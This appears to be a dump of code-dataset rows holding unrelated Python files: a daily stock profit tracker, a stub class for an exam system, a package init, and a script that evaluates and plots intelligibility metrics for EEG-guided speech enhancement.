#这样会不会把原来的覆盖掉? new_df.to_excel(save_name) if __name__ == "__main__": today=datetime.datetime.now().strftime("%Y-%m-%d") if not ts.is_holiday(today): main(today)
# -*-coding=utf-8-*- __author__ = 'Rocky' ''' http://30daydo.com Contact: <EMAIL> ''' ''' 记录每天的盈亏情况 完成度100% ''' import pandas as pd import os import tushare as ts import datetime def getCodeFromExcel(filename): #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 df=pd.read_excel(filename) code_list = df['证券代码'].values quantity_list=df['股票余额'].values code=[] quantity=[] for i in range(len(code_list)): code.append(str(code_list[i]).zfill(6)) #后面学会了map函数,可以直接搞定 quantity.append(quantity_list[i]) return code,quantity def calc(code): settlement = df[df['code']==code]['settlement'].values percentage = df[df['code']==code]['changepercent'].values trade = df[df['code']==code]['trade'].values #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 return settlement,percentage,trade def today_win_lost(filename_path): filename=os.path.join(filename_path,'ownstock.xls') code,quantity=getCodeFromExcel(filename) result=[] percentage_list=[] trade_list=[] for i in range(len(code)): settlement,percentage,trade=calc(code[i]) print("settlement", settlement) print("percent", percentage) print("trade", trade) profit=round(settlement[0]*percentage[0]*quantity[i]*0.01,1) result.append(profit) percentage_list.append(percentage[0]) trade_list.append(trade[0]) return result,code,percentage_list,trade_list def join_dataframe(filename,today): current_profile=today+'当天贡献' result,code,percentage_list,trade_list=today_win_lost() s1=pd.DataFrame({current_profile:result}) #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) df=pd.read_excel(filename) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] df['证券代码']=code #print(code) df['市价']=trade_list df['当天涨幅']=percentage_list #可以这样直接替换某一列的值 #df=df.join(s2,how='right') df=df.join(s1,how='right') #df=df.join(s3,how='right') return df def main(today): path=os.path.join(os.path.dirname(__file__),'data') filename=os.path.join(path,'each_day_profile.xls') org_filename=os.path.join(path,'2016-09-30_all_.xls') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) df=ts.get_today_all() new_df=join_dataframe(filename,today) save_name=os.path.join(path,"each_day_profile.xls") #这样会不会把原来的覆盖掉? new_df.to_excel(save_name) if __name__ == "__main__": today=datetime.datetime.now().strftime("%Y-%m-%d") if not ts.is_holiday(today): main(today)
zh
0.270093
# -*-coding=utf-8-*- http://30daydo.com Contact: <EMAIL> 记录每天的盈亏情况 完成度100% #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 #后面学会了map函数,可以直接搞定 #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] #print(code) #可以这样直接替换某一列的值 #df=df.join(s2,how='right') #df=df.join(s3,how='right') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) #这样会不会把原来的覆盖掉?
3.036712
3
AutoExamSys/SystemModel/UsersClass/teacher.py
Yb-Z/COMP2411_GP
0
6623624
#!/usr/bin/env python # -*- coding: UTF-8 -*- import pandas as pd ''' Functions 1. Get personal info. ... TODO ''' class Teacher(object): def __init__(self, config): self.id;
#!/usr/bin/env python # -*- coding: UTF-8 -*- import pandas as pd ''' Functions 1. Get personal info. ... TODO ''' class Teacher(object): def __init__(self, config): self.id;
en
0.253096
#!/usr/bin/env python # -*- coding: UTF-8 -*- Functions 1. Get personal info. ... TODO
2.645635
3
control_limits/__init__.py
papelero/control-limit-search
0
6623625
from .src import ControlLimits, plot_control_limits
from .src import ControlLimits, plot_control_limits
none
1
1.032779
1
tools/LoadAndFindIntelligibility.py
MaryamHoss/BESD
0
6623626
<reponame>MaryamHoss/BESD # this will load noisy, clean and different predictions import os, sys import h5py as hp import matplotlib.pyplot as plt sys.path.append('../') import tensorflow as tf import numpy as np sound_len = 87552 # 218880 from TrialsOfNeuralVocalRecon.tools.calculate_intelligibility import find_intel from TrialsOfNeuralVocalRecon.tools.utils.losses import * #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/3-both speakers\Linear/'#'Linear/' #test_path='D:/data/EEG processed data/luca way' test_path='D:/data/EEG processed data/2_sec' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] file=hp.File(test_path+'/eegs_test.h5','r') eeg=file['eegs_test'][:] file.close() #load clean sound file=hp.File(test_path+'/clean_test.h5','r') clean=file['clean_test'][:] file.close() clean=clean[:,0:sound_len,:] clean=clean[:,::3,:] #### do the prediction: With_spike=exp_folder+'noSpike/trained_models/model_weights_noSpikes_pre' #model_weights_WithSpikes_predict.h5' model=tf.keras.models.load_model(With_spike, custom_objects={'si_sdr_loss': si_sdr_loss}) prediction_withSpikes_film1=model.predict([snd,eeg]) np.save(exp_folder+'film1/prediction',prediction_withSpikes_film1) #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes exp_type='film1' size=prediction_withSpikes_film1.shape[0] intel_matrix_film1=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film1=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film1=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film1[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film1[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film1[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film1[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film1/loss_matrix',intel_matrix_film1) #load prediction with spikes exp_type='film2' size=prediction_withSpikes_film2.shape[0] intel_matrix_film2=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film2=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film2=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film2[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film2[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film2[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film2[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film2/loss_matrix',intel_matrix_film2) #load prediction with spikes exp_type='film3' size=prediction_withSpikes_film3.shape[0] intel_matrix_film3=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film3=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film3=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film3[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film3[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film3[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film3[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film3/loss_matrix',intel_matrix_film3) #load prediction with spikes exp_type='film4' size=prediction_withSpikes_film4.shape[0] intel_matrix_film4=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film4=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film4=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film4[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film4[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film4[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film4[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film4/loss_matrix',intel_matrix_film4) #load prediction with spikes exp_type='add' intel_matrix_add=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_add=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_add=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_add[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_add[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_add[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_add[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='choice' intel_matrix_choice=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_choice=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_choice=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_choice[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_choice[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_choice[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_choice[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='concatenate' intel_matrix_concatenate=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_concatenate=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_concatenate=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_concatenate[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_concatenate[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_concatenate[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_concatenate[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='si-sdr') #no spikes exp_type='noSpike' size=prediction_noSpike.shape[0] intel_matrix_noSpike=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_noSpike=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_noSpike=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_noSpike[i,0]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noSpike[i,1]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noSpike[i,2]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noSpike[i,3]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+exp_type+'loss_matrix',intel_matrix_noSpike) import h5py as hp exp_type='noisy' intel_matrix_noisy=np.zeros(shape=(size,1)) #0:pesq 1:stoi 2:estoi 3:si-sdr file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] size=snd.shape[0] intel_matrix_noisy=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr intel_matrix_noisy=np.load(exp_folder+'loss_matrix_noisy.npy') for i in range(size): print(i) intel_matrix_noisy[i,0]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noisy[i,1]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noisy[i,2]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noisy[i,3]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'loss_matrix_noisy',intel_matrix_noisy) exp_folder = '../data' intel_matrix_noisy = np.load(exp_folder + '/loss_matrix_wo_eeg.npy') intel_matrix = np.load(exp_folder + '/loss_matrix_with_eeg.npy') fusions = ['film1', 'film2', 'film3', 'film4', 'add', 'concat', 'choice', 'noSp', 'noisy'] metrics = ['pesq', 'stoi', 'estoi', 'si-sdr'] fusions = ['mixture', 'BESD'] metrics = ['PESQ', 'STOI', 'ESTOI', 'SI-SDR'] data = [] z = 2 # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) data.append(intel_matrix_noisy[:, z]) #data.append(intel_matrix_noSpike[:, z]) data.append(intel_matrix[:, z]) ld = len(metrics) lm = len(fusions) width = 1 / lm - .05 X = np.arange(ld) """ fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") """ num_boxes = len(data) pos = np.arange(num_boxes) + 1 medians = np.zeros(shape=len(data)) for i in range(num_boxes): medians[i] = np.median(data[i]) upper_labels = [str(np.round(s, 2)) for s in medians] weights = ['bold', 'semibold'] """ fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show() """ fig, ax = plt.subplots() violin_handle = ax.violinplot(data, showmeans=False, showmedians=False, showextrema=False, widths=.7) colors = plt.cm.gist_ncar(np.linspace(0.2, .8, len(violin_handle['bodies']))) np.random.seed(0) colors = plt.cm.twilight(np.random.rand(len(violin_handle['bodies']))) np.random.shuffle(colors) for pc, c in zip(violin_handle['bodies'], colors): pc.set_facecolor(c) pc.set_edgecolor('black') pc.set_alpha(1.) for tick, label in zip(range(num_boxes), ax.get_xticklabels()): k = tick % 2 ax.text(pos[tick], .95, upper_labels[tick], transform=ax.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) ax.set_ylabel(metrics[z]) ax.set_ylim(-10, 15) plt.xticks(np.arange(len(fusions)) + 1, fusions) plt.show() fig.savefig('cocktail_sisdr_violins.pdf', bbox_inches='tight')
# this will load noisy, clean and different predictions import os, sys import h5py as hp import matplotlib.pyplot as plt sys.path.append('../') import tensorflow as tf import numpy as np sound_len = 87552 # 218880 from TrialsOfNeuralVocalRecon.tools.calculate_intelligibility import find_intel from TrialsOfNeuralVocalRecon.tools.utils.losses import * #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/3-both speakers\Linear/'#'Linear/' #test_path='D:/data/EEG processed data/luca way' test_path='D:/data/EEG processed data/2_sec' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] file=hp.File(test_path+'/eegs_test.h5','r') eeg=file['eegs_test'][:] file.close() #load clean sound file=hp.File(test_path+'/clean_test.h5','r') clean=file['clean_test'][:] file.close() clean=clean[:,0:sound_len,:] clean=clean[:,::3,:] #### do the prediction: With_spike=exp_folder+'noSpike/trained_models/model_weights_noSpikes_pre' #model_weights_WithSpikes_predict.h5' model=tf.keras.models.load_model(With_spike, custom_objects={'si_sdr_loss': si_sdr_loss}) prediction_withSpikes_film1=model.predict([snd,eeg]) np.save(exp_folder+'film1/prediction',prediction_withSpikes_film1) #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes exp_type='film1' size=prediction_withSpikes_film1.shape[0] intel_matrix_film1=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film1=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film1=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film1[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film1[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film1[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film1[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film1/loss_matrix',intel_matrix_film1) #load prediction with spikes exp_type='film2' size=prediction_withSpikes_film2.shape[0] intel_matrix_film2=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film2=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film2=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film2[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film2[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film2[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film2[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='si-sdr') # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') np.save(exp_folder+'film2/loss_matrix',intel_matrix_film2) #load prediction with spikes exp_type='film3' size=prediction_withSpikes_film3.shape[0] intel_matrix_film3=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film3=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film3=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film3[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film3[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film3[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film3[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film3[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film3/loss_matrix',intel_matrix_film3) #load prediction with spikes exp_type='film4' size=prediction_withSpikes_film4.shape[0] intel_matrix_film4=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_film4=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_film4=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_film4[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_film4[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_film4[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_film4[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film4[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'film4/loss_matrix',intel_matrix_film4) #load prediction with spikes exp_type='add' intel_matrix_add=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_add=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_add=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_add[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_add[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_add[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_add[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_add[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='choice' intel_matrix_choice=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_choice=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_choice=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_choice[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_choice[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_choice[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_choice[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_choice[i:i+1,:,:],metric='si-sdr') #load prediction with spikes exp_type='concatenate' intel_matrix_concatenate=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_withSpikes_concatenate=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_concatenate=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(833): print(i) intel_matrix_concatenate[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:]) for i in range(833): print(i) intel_matrix_concatenate[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_concatenate[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='estoi') for i in range(833): print(i) intel_matrix_concatenate[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='si-sdr') #no spikes exp_type='noSpike' size=prediction_noSpike.shape[0] intel_matrix_noSpike=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_noSpike=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_noSpike=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_noSpike[i,0]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noSpike[i,1]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noSpike[i,2]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noSpike[i,3]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+exp_type+'loss_matrix',intel_matrix_noSpike) import h5py as hp exp_type='noisy' intel_matrix_noisy=np.zeros(shape=(size,1)) #0:pesq 1:stoi 2:estoi 3:si-sdr file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] size=snd.shape[0] intel_matrix_noisy=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr intel_matrix_noisy=np.load(exp_folder+'loss_matrix_noisy.npy') for i in range(size): print(i) intel_matrix_noisy[i,0]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noisy[i,1]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noisy[i,2]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noisy[i,3]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'loss_matrix_noisy',intel_matrix_noisy) exp_folder = '../data' intel_matrix_noisy = np.load(exp_folder + '/loss_matrix_wo_eeg.npy') intel_matrix = np.load(exp_folder + '/loss_matrix_with_eeg.npy') fusions = ['film1', 'film2', 'film3', 'film4', 'add', 'concat', 'choice', 'noSp', 'noisy'] metrics = ['pesq', 'stoi', 'estoi', 'si-sdr'] fusions = ['mixture', 'BESD'] metrics = ['PESQ', 'STOI', 'ESTOI', 'SI-SDR'] data = [] z = 2 # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) data.append(intel_matrix_noisy[:, z]) #data.append(intel_matrix_noSpike[:, z]) data.append(intel_matrix[:, z]) ld = len(metrics) lm = len(fusions) width = 1 / lm - .05 X = np.arange(ld) """ fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") """ num_boxes = len(data) pos = np.arange(num_boxes) + 1 medians = np.zeros(shape=len(data)) for i in range(num_boxes): medians[i] = np.median(data[i]) upper_labels = [str(np.round(s, 2)) for s in medians] weights = ['bold', 'semibold'] """ fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show() """ fig, ax = plt.subplots() violin_handle = ax.violinplot(data, showmeans=False, showmedians=False, 